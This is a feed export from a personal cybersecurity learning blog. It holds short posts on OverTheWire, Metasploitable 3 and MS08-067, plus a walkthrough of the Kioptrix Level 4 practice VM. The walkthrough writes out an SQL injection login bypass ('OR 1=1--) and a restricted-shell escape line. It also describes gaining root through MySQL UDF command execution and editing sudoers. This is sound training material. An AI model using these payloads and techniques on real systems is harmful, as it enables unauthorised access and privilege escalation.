tag:blogger.com,1999:blog-41159631200176677462024-02-19T03:21:11.454+00:00My Journey in Cyber SecurityMy Journey in Cyber SecurityVolta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-4115963120017667746.post-8555726806172032282017-04-20T10:36:00.002+01:002017-04-20T10:36:34.471+01:00Playing with Buffer Overflows<div dir="ltr" style="text-align: left;" trbidi="on">
I will not profess to be being a ninja in the art of BOF. I understand some c code and get how the stack works. But................ Exploiting code? Well that's something I need to work on!<br />
<br />
I decided to revisit <a href="http://overthewire.org/">Overthewire</a> and try my luck with <a href="http://overthewire.org/wargames/narnia/">narnia</a>. Wish me luck!!!!<br />
<br />
I will update as I go along.</div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-3044029957201162412017-03-02T10:27:00.000+00:002017-03-02T10:27:04.251+00:00Installing Metasploitable 3<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://i.ytimg.com/vi/x9hd-Z1avJY/hqdefault.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://i.ytimg.com/vi/x9hd-Z1avJY/hqdefault.jpg" width="320" /></a></div>
<br />
<br />
<br />
Metasploitable is an awesome VM to practice your skills against, so when Rapid 7 released Metasploitable 3 I was excited!!! However installing it is a pain in the bum 😓 However I found this excellent blog entry which works a treat. So if you are having issues follow this and happy hacking!!<br />
<br />
<a href="http://advanced-crm.co.uk/t/metasploitable-3-how-to-install/98">Install Metasploitable 3</a></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-28218084071877201072017-02-16T14:52:00.002+00:002017-02-16T14:52:33.844+00:00MS08_067 How it works<div dir="ltr" style="text-align: left;" trbidi="on">
MS08_067 is probably one of the most famous exploits out there, but trying to find information on how it actually works can be a nightmare. I came across a brilliant piece of writing from Jason Matthyser at MWR Labs, so I thought I would share it here:<br />
<br />
<br />
<iframe height="700" src="https://drive.google.com/file/d/0B-nERnC5GedOZThoY1ZnUFdRb00/preview" width="640"></iframe><br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-82619847954399452232017-02-16T14:45:00.001+00:002017-02-16T14:53:58.422+00:00Kioptrix Level 4<div dir="ltr" style="text-align: left;" trbidi="on">
Back at the next Kioptrix Level. This one was a little bit sneakier than the last one. I had to scratch my head a few times that's for certain!!<br />
<br />
<b><u>NMap</u></b><br />
<b><u><br />
</u></b> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLpA-fByuSaUFMJac1Hkl2d_Zy0a-QIPY8rj2uZXVa40JxIXy7Mioo84PmdzDsbwU95TcSyG-vzx_kGeS9DQDyMIWstSuY_LnoWWyy9vKwdo0rKNW_JqBG38XTXWuYCCV9HyxcbxFOit4/s1600/Screenshot+from+2017-02-16+10-17-46.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLpA-fByuSaUFMJac1Hkl2d_Zy0a-QIPY8rj2uZXVa40JxIXy7Mioo84PmdzDsbwU95TcSyG-vzx_kGeS9DQDyMIWstSuY_LnoWWyy9vKwdo0rKNW_JqBG38XTXWuYCCV9HyxcbxFOit4/s640/Screenshot+from+2017-02-16+10-17-46.png" width="640" /></a></div>
<b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <br />
We can see that the usual ports are open (22,80) but we have 139 & 445 now. The service scan has given me a little bit of info so it's time to see what else it can yield via Enum4Linux.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGgg3d_xfOBnJO06LbDlEIYMDTu_lioTfh0rTpUXdjcIfPbQOjLSGs43NlehNkM4BrxgT5gfz_aFAx3wCxWgswaLjeTGjuJ3g_AfdvWQ6DKoMaQJYP__one70mVAt2FqgQVg30qLlcRw/s1600/Screenshot+from+2017-02-16+10-21-13.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGgg3d_xfOBnJO06LbDlEIYMDTu_lioTfh0rTpUXdjcIfPbQOjLSGs43NlehNkM4BrxgT5gfz_aFAx3wCxWgswaLjeTGjuJ3g_AfdvWQ6DKoMaQJYP__one70mVAt2FqgQVg30qLlcRw/s640/Screenshot+from+2017-02-16+10-21-13.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like I have a few users to try, I'll goto the web page and see what awaits.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt2kL3cIku4HYVtPsBCuido5TZvqFfaq5aQDWvHvewNqpN5XGFo30PtBzxxOl7SJEHxGHSe5ic1r2C-uXellKzq6vJgb2GSkSh2eBr8Ai6BHoHmlozKxotnRuQWp5Yc5RXUqNRu82a6a4/s1600/Screenshot+from+2017-02-16+10-18-21.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt2kL3cIku4HYVtPsBCuido5TZvqFfaq5aQDWvHvewNqpN5XGFo30PtBzxxOl7SJEHxGHSe5ic1r2C-uXellKzq6vJgb2GSkSh2eBr8Ai6BHoHmlozKxotnRuQWp5Yc5RXUqNRu82a6a4/s640/Screenshot+from+2017-02-16+10-18-21.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Just a login page. There is nothing hidden or showing up via Dirb and Nikto isn't giving much away either.<br />
<br />
I try one of the usernames to see what I get.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6HRLCbIakq-V8r8cbf_WuGw4nhlPT_vAnHqayr2PljwBs_SyxejNr3hNSzX58_-bjOpnpY-vUCq1S0fnTHetNpcxucHxchkQxd5Jg-kV0fHFXndAeetVSedRElBn1Q0GnafqTjMGG6Yk/s1600/Screenshot+from+2017-02-16+13-24-16.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6HRLCbIakq-V8r8cbf_WuGw4nhlPT_vAnHqayr2PljwBs_SyxejNr3hNSzX58_-bjOpnpY-vUCq1S0fnTHetNpcxucHxchkQxd5Jg-kV0fHFXndAeetVSedRElBn1Q0GnafqTjMGG6Yk/s640/Screenshot+from+2017-02-16+13-24-16.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It looks like it's talking to a database of some kind in the background, so I will try and see if I can get it to error.<br />
<br />
Using :<br />
<br />
<br />
<pre class="brush: bash">username: john
password: 'OR 1=1--
</pre>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8gBRn14WbeefSj57F4rj1VgRgyhftuyexlpDAnen00PW_CNQZXn641scP5Mzz5d8extL_iEbQQvYNmGoYdh2koo04hvdcvAFFN3yMDddwtT5SCkZIPXYoidGwH_xvmXTv-Rfgupba7dw/s1600/Screenshot+from+2017-02-16+13-24-40.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8gBRn14WbeefSj57F4rj1VgRgyhftuyexlpDAnen00PW_CNQZXn641scP5Mzz5d8extL_iEbQQvYNmGoYdh2koo04hvdcvAFFN3yMDddwtT5SCkZIPXYoidGwH_xvmXTv-Rfgupba7dw/s640/Screenshot+from+2017-02-16+13-24-40.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I get this nice MySQL error :)<br />
<br />
I try hitting the boxes with various SQLi variations but I don't get a hit. So I decided to see if I could modify it on the fly via Tamper Data.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfUu934-qhKno5a_sGFhYtzfCHOFqvD4SXyfptUt6xOYGFqlTlk2Q-4WzWSWrAkha43INytKWh6QPR8CSnBBrCrmP9BMvD-TTuxILOIh7Gftjxnl63QtRM5yHxF4z58d9YQkoR9oOI5-4/s1600/Screenshot+from+2017-02-16+13-34-59.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfUu934-qhKno5a_sGFhYtzfCHOFqvD4SXyfptUt6xOYGFqlTlk2Q-4WzWSWrAkha43INytKWh6QPR8CSnBBrCrmP9BMvD-TTuxILOIh7Gftjxnl63QtRM5yHxF4z58d9YQkoR9oOI5-4/s640/Screenshot+from+2017-02-16+13-34-59.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Awesome news awaits:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEkH346sn9btFt4vKDmebAJGHkYWWGjKM5wdnA7ZH9hY9k_7WwsAygC7pGjXOpxof35XEKeZz-dw_g36RUpxW_PcKqexQe56p1jBaA6mkOBdRHpics54pIsZh86VHrWq-PMW0tJt7Iorc/s1600/Screenshot+from+2017-02-16+10-24-27.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEkH346sn9btFt4vKDmebAJGHkYWWGjKM5wdnA7ZH9hY9k_7WwsAygC7pGjXOpxof35XEKeZz-dw_g36RUpxW_PcKqexQe56p1jBaA6mkOBdRHpics54pIsZh86VHrWq-PMW0tJt7Iorc/s640/Screenshot+from+2017-02-16+10-24-27.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I now have potential login credential.<br />
<br />
I try the same with robert and I get:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWdLj_kH5c4TW39_RyQ0AOavzKF2n4CFJ0GEnlC5ebHwNLFZvFSq4VX-z5A5ASyFo6XGtgSC1cmAWPyMaw8mIrA0rBKOJPVDhX0Y30VyRZn07C2UpmZ6Wfl-1p9JZ7RJrV6HjaB9zhez4/s1600/Screenshot+from+2017-02-16+13-37-38.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWdLj_kH5c4TW39_RyQ0AOavzKF2n4CFJ0GEnlC5ebHwNLFZvFSq4VX-z5A5ASyFo6XGtgSC1cmAWPyMaw8mIrA0rBKOJPVDhX0Y30VyRZn07C2UpmZ6Wfl-1p9JZ7RJrV6HjaB9zhez4/s640/Screenshot+from+2017-02-16+13-37-38.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The password gives rogue values when I try to decode it via base64. So I decide to try my luck with John's creds on the ssh service.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWGFJIwnFTOSnsL0LMhxXdbDUanpVhY_RzWWPk4MbAP9PdnwV-1x7GhUJJQfKxG1jP45UCf634oBMkPCcuYUBRjZRziX-KfEZQQOlBiJ-pY0J0gMUI0NJ_T2NjQ4U0bp4yMny_biXMkU8/s1600/Screenshot+from+2017-02-16+10-25-04.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWGFJIwnFTOSnsL0LMhxXdbDUanpVhY_RzWWPk4MbAP9PdnwV-1x7GhUJJQfKxG1jP45UCf634oBMkPCcuYUBRjZRziX-KfEZQQOlBiJ-pY0J0gMUI0NJ_T2NjQ4U0bp4yMny_biXMkU8/s640/Screenshot+from+2017-02-16+10-25-04.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And they work!! This is awesome. But what's this banner about?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh22mpAegLdxR2yAcUjRgXpOsNwSRMB7P9P8wb2ClGV4D3oCNLTImL6g-lA2zOoRZ9_v5Dpl05d8afI0AEP18Vk_E29-b_iX3oU9gAfMNb630OybUqtiT6sYHkPfnTKZ5WG8JkPjeD9D3I/s1600/Screenshot+from+2017-02-16+10-25-25.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh22mpAegLdxR2yAcUjRgXpOsNwSRMB7P9P8wb2ClGV4D3oCNLTImL6g-lA2zOoRZ9_v5Dpl05d8afI0AEP18Vk_E29-b_iX3oU9gAfMNb630OybUqtiT6sYHkPfnTKZ5WG8JkPjeD9D3I/s640/Screenshot+from+2017-02-16+10-25-25.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like I am in jail!!! I need to break out of my cell. As echo is available I try<br />
<br />
<pre class="brush: bash">echo os.system('/bin/bash')
</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvEy9uxrYGfCPYIvb651D5uD2qltkfaylP6HSdSmFQCEtdSW_6_XUmh_2up6ywBov7Mkv-OTC_sGrf5ibn_aPQ2XoTakKe9PaeYS-CkygIEkOmv2_fqZrUqAFpEpB3olmmNCCOjdqTIw4/s1600/Screenshot+from+2017-02-16+13-44-33.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvEy9uxrYGfCPYIvb651D5uD2qltkfaylP6HSdSmFQCEtdSW_6_XUmh_2up6ywBov7Mkv-OTC_sGrf5ibn_aPQ2XoTakKe9PaeYS-CkygIEkOmv2_fqZrUqAFpEpB3olmmNCCOjdqTIw4/s640/Screenshot+from+2017-02-16+13-44-33.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I now need to enumerate this box. I could do this manually but automation makes life easier. I look for a way to transfer files:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicA_GCj3yXfBFa5dlAT6VcshymLjYD1ezjddNTbSTBwSUX-bcpfbe5J6DZ7XLmgtik4We7ajiLkrW2zsNxtYPJM13rRMyay5KXjtoW2OAi3RRzhdpX3siKG4XlvnE0chClIUG5-xUENoE/s1600/Screenshot+from+2017-02-16+13-45-16.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicA_GCj3yXfBFa5dlAT6VcshymLjYD1ezjddNTbSTBwSUX-bcpfbe5J6DZ7XLmgtik4We7ajiLkrW2zsNxtYPJM13rRMyay5KXjtoW2OAi3RRzhdpX3siKG4XlvnE0chClIUG5-xUENoE/s640/Screenshot+from+2017-02-16+13-45-16.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I have few tools at my disposal here which is good.<br />
<br />
I try wget via a python server to get <a href="https://github.com/monkeysm8/LinEnum">LinuxEnum.sh</a> on my attack box:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKK8K4M5xihI_TKaSwnFVhIyMBMRoUZFPlSWBLL-ZHWWatyo7ek0v4VxA4HmSeBR9QcqbqUKRX4YfjLLpvFBRv7mJZctHujd6ZZiSFgytTAhPjD-TPrX7NBB4DQSCunTAVUGlQmW-AGjM/s1600/Screenshot+from+2017-02-16+13-54-24.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="432" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKK8K4M5xihI_TKaSwnFVhIyMBMRoUZFPlSWBLL-ZHWWatyo7ek0v4VxA4HmSeBR9QcqbqUKRX4YfjLLpvFBRv7mJZctHujd6ZZiSFgytTAhPjD-TPrX7NBB4DQSCunTAVUGlQmW-AGjM/s640/Screenshot+from+2017-02-16+13-54-24.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmmmm, this doesn't look good. I wonder if there is a rule in place to block this traffic? I'll try netcat<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU9Qg8UEbIS6gsPSZJS6f7aaa8nWalJAHyFFbFZKWtNK8vKMlmDFrGmFQ-TWtdEyk60BV8zPWPximxE_cP3Ft1p_j9qw2HMcFK-qBBRRJGrpCXuwKeOIB4SDeWhCMK09Ti2Z7FQrOc40Q/s1600/Screenshot+from+2017-02-16+13-56-47.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU9Qg8UEbIS6gsPSZJS6f7aaa8nWalJAHyFFbFZKWtNK8vKMlmDFrGmFQ-TWtdEyk60BV8zPWPximxE_cP3Ft1p_j9qw2HMcFK-qBBRRJGrpCXuwKeOIB4SDeWhCMK09Ti2Z7FQrOc40Q/s640/Screenshot+from+2017-02-16+13-56-47.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
That's better!! Now to see what lurks on this box:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ww5ZBRLD_n6CqtJoKoK5nVOdN5JS7z3gk2ibH1yw3odwA_9MxiklmDKuIq2Pzu2mLUHLAyKQsIVZQsmJDXdFa0Q9CuKuwj0mf8O2Rry6HuWqT9cnk2pN2JfJWa86yB7yrlmqgkOPOS8/s1600/Screenshot+from+2017-02-16+13-58-58.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="492" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ww5ZBRLD_n6CqtJoKoK5nVOdN5JS7z3gk2ibH1yw3odwA_9MxiklmDKuIq2Pzu2mLUHLAyKQsIVZQsmJDXdFa0Q9CuKuwj0mf8O2Rry6HuWqT9cnk2pN2JfJWa86yB7yrlmqgkOPOS8/s640/Screenshot+from+2017-02-16+13-58-58.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
MySQL with root privileges! This could be useful:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHLtlKdK1fia0MlIhcSpPOIY22eYz7Ozq0zgbCPE1ETkseEiRFQfdhcEsJqZr8XUsxtOEpmsZjc2qcGD6ZgGT6exVYiyGQwGUhyphenhyphenIdhxrhr5i1wbGhELkLC_M9-aWkVqc7Phz45gATBF74/s1600/Screenshot+from+2017-02-16+13-59-38.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHLtlKdK1fia0MlIhcSpPOIY22eYz7Ozq0zgbCPE1ETkseEiRFQfdhcEsJqZr8XUsxtOEpmsZjc2qcGD6ZgGT6exVYiyGQwGUhyphenhyphenIdhxrhr5i1wbGhELkLC_M9-aWkVqc7Phz45gATBF74/s640/Screenshot+from+2017-02-16+13-59-38.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I can see the databases time to see what lurks within:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjav7R_sf266FlVTjzSDgM0H7i2Gdc1phqnFj_jM2sPApy3l0EJN-peO1X4N5QrMqppyIaJCZP8NBKulQn4yuYTR9uxAJOZHcMzHcFZquvNdPasQbqd1RNUEzbSNFZF3KEh2ZrhSDhomqA/s1600/Screenshot+from+2017-02-16+14-00-08.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjav7R_sf266FlVTjzSDgM0H7i2Gdc1phqnFj_jM2sPApy3l0EJN-peO1X4N5QrMqppyIaJCZP8NBKulQn4yuYTR9uxAJOZHcMzHcFZquvNdPasQbqd1RNUEzbSNFZF3KEh2ZrhSDhomqA/s640/Screenshot+from+2017-02-16+14-00-08.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nothing I don't already have. I wonder if I can execute commands from within? This <a href="http://bernardodamele.blogspot.nl/2009/01/command-execution-with-mysql-udf.html">BLOG</a> is useful in that regard<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGENpiQ93ZgqpLKrTwNC2uE04gzJzH4CbUIDHQ6Ut1HOkeJN8W2Nl8m8FTzv4n2s6qN1TON9CMAsYfi52eSz_Rz4igE2LoGEWvvNLxmhDQ574Heb5FozKOxQun-x6FzPl1Bb_jOPEsmE4/s1600/Screenshot+from+2017-02-16+14-01-55.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGENpiQ93ZgqpLKrTwNC2uE04gzJzH4CbUIDHQ6Ut1HOkeJN8W2Nl8m8FTzv4n2s6qN1TON9CMAsYfi52eSz_Rz4igE2LoGEWvvNLxmhDQ574Heb5FozKOxQun-x6FzPl1Bb_jOPEsmE4/s640/Screenshot+from+2017-02-16+14-01-55.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLkwgktkRi9xoNxypl2mXEdZ1g19e1CAF6Hkd6ETqbUlPtQ4sLv3stFUL-5Ho64RwbClsSbrz9lDlMGSwTeJv9eQY0mMxkYfy_fNBWenqhf8d5k1tCOooC3Nbqkao-d7hnQsCmestfsFE/s1600/Screenshot+from+2017-02-16+14-02-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLkwgktkRi9xoNxypl2mXEdZ1g19e1CAF6Hkd6ETqbUlPtQ4sLv3stFUL-5Ho64RwbClsSbrz9lDlMGSwTeJv9eQY0mMxkYfy_fNBWenqhf8d5k1tCOooC3Nbqkao-d7hnQsCmestfsFE/s640/Screenshot+from+2017-02-16+14-02-07.png" width="640" /></a></div>
<br />
As I am in as root every command I run is the same as root running it so I can start doing something about my current privileges. The sudoers file seems a good start!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV0IM8Iv0-so9ga9XkIyGvBMjGygwhfi6Oji8aeo5iS6bTwGrmh7iookWo4B-0vwJo4wpJP5oi1RG6B3T7MWUECtg1nzS1KBKmrFZlUQcKJpd0RT7BKn7lZIwLDjftnlkhuPu23pWp5HY/s1600/Screenshot+from+2017-02-16+14-04-48.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV0IM8Iv0-so9ga9XkIyGvBMjGygwhfi6Oji8aeo5iS6bTwGrmh7iookWo4B-0vwJo4wpJP5oi1RG6B3T7MWUECtg1nzS1KBKmrFZlUQcKJpd0RT7BKn7lZIwLDjftnlkhuPu23pWp5HY/s640/Screenshot+from+2017-02-16+14-04-48.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJB3K9YVopnjei9bW647kTj2UOVI9T5v67KsRpHMTp9PZZrJv1BEmutS1D9JzVATrquOtYnwwD0BeHtTZnDeaOhI8xzUAYU13LXV2FR2lpPvDGhm4yZsCi3CiY2G25fMxhxlAKcGPCRt0/s1600/Screenshot+from+2017-02-16+14-04-29.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJB3K9YVopnjei9bW647kTj2UOVI9T5v67KsRpHMTp9PZZrJv1BEmutS1D9JzVATrquOtYnwwD0BeHtTZnDeaOhI8xzUAYU13LXV2FR2lpPvDGhm4yZsCi3CiY2G25fMxhxlAKcGPCRt0/s640/Screenshot+from+2017-02-16+14-04-29.png" width="640" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU88xzQVAfuuW6SIbfhYT8W3R24OE-RvmL6EklehjE6u7gxOUIpyBqcyKxmnZDotW5Iti-8l6WVKL53mLs32TYC7lh74uSXoI5UQVpmjSVIvgfeImTZlkV1nX5DbsN1l8VxQ_iP1fk36w/s1600/Screenshot+from+2017-02-16+14-05-35.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU88xzQVAfuuW6SIbfhYT8W3R24OE-RvmL6EklehjE6u7gxOUIpyBqcyKxmnZDotW5Iti-8l6WVKL53mLs32TYC7lh74uSXoI5UQVpmjSVIvgfeImTZlkV1nX5DbsN1l8VxQ_iP1fk36w/s640/Screenshot+from+2017-02-16+14-05-35.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEittgmchdczzhvJmX2VuAOmLOJE3Iat8lMHBOlmULEfZCfZ9T5fqDYrJduJjTmXfiTHe74uvm8XBaL1nNSGMPYQUjy_oPFUvVVPKsMU6fhldAlNpvNbJe6vdgnwqz-0Nc0-XK5SbLWzGvw/s1600/Screenshot+from+2017-02-16+14-05-55.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEittgmchdczzhvJmX2VuAOmLOJE3Iat8lMHBOlmULEfZCfZ9T5fqDYrJduJjTmXfiTHe74uvm8XBaL1nNSGMPYQUjy_oPFUvVVPKsMU6fhldAlNpvNbJe6vdgnwqz-0Nc0-XK5SbLWzGvw/s640/Screenshot+from+2017-02-16+14-05-55.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like that worked!!! No exploits to compile or Metasploit modules to run, just old fashioned enumerating and reading. <br />
<br />
I really enjoyed this VM, I think it has been one of my favourites so far.</div>
